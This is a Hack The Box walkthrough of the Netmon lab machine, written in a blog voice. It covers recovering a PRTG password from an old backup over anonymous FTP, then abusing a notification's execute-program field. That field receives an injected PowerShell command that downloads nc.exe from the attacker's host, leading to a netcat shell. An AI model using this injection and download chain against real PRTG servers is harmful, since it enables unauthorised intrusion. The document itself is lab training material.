Hackthebox Walkthroughs:Netmon

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Hello Again, Netmon is windows machine from hackthebox. I enjoyed getting root of this machine as it required little extra out of box thinking. Let’s start the dirty work,the IP of machine is 10.10.10.152.

Scanning with Nmap: nmap -sV 10.10.10.152
Manish Bhardwaj's Blog

As we can see on port 21, Anonymous login is allowed. So let’s play with FTP.

Manish Bhardwaj's Blog
Manish Bhardwaj's Blog

After googling about PRTG configuration file,I found the locations as

%programdata%\Paessler\PRTG Network Monitor
Manish Bhardwaj's Blog

After looking through the files,I found password in PRTG Configuration.old.bak and if you can see, the database isn’t updated from a long back,i.e. 2018. So the password in 2018 was with the same year number, it’s 2019 so I changed the password to same year.

Tadda!! I logged in.

After visiting the profile section, I tried to add new notification.

Let me create a new notification with the name testMB

I gave a random file name and tried to copy the root.txt file to a new file which is minions.txt and as the cruse of pentest follows, I was unable to copy the root flag.(took 20-30 attempts)

I returned to the swiss army knife and tried this time with nc.exe.

Again I edited the execute Program and tried too transfer nc.exe from my kali to target.

test.txt; Invoke-WebRequest http://10.10.14.9:8000/nc.exe -OutFile c:\Users\Public\Downloads\nc.exe

Let’s check whether nc is transferred or not.

Woooshh!! Finally, something good happened. Let’s try to execute nc and start nc listener on kali.

Well this worked and finally, after the plethora of trail, I got shell with root.txt.

Visit:Cosmicskills AzureSkynet

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top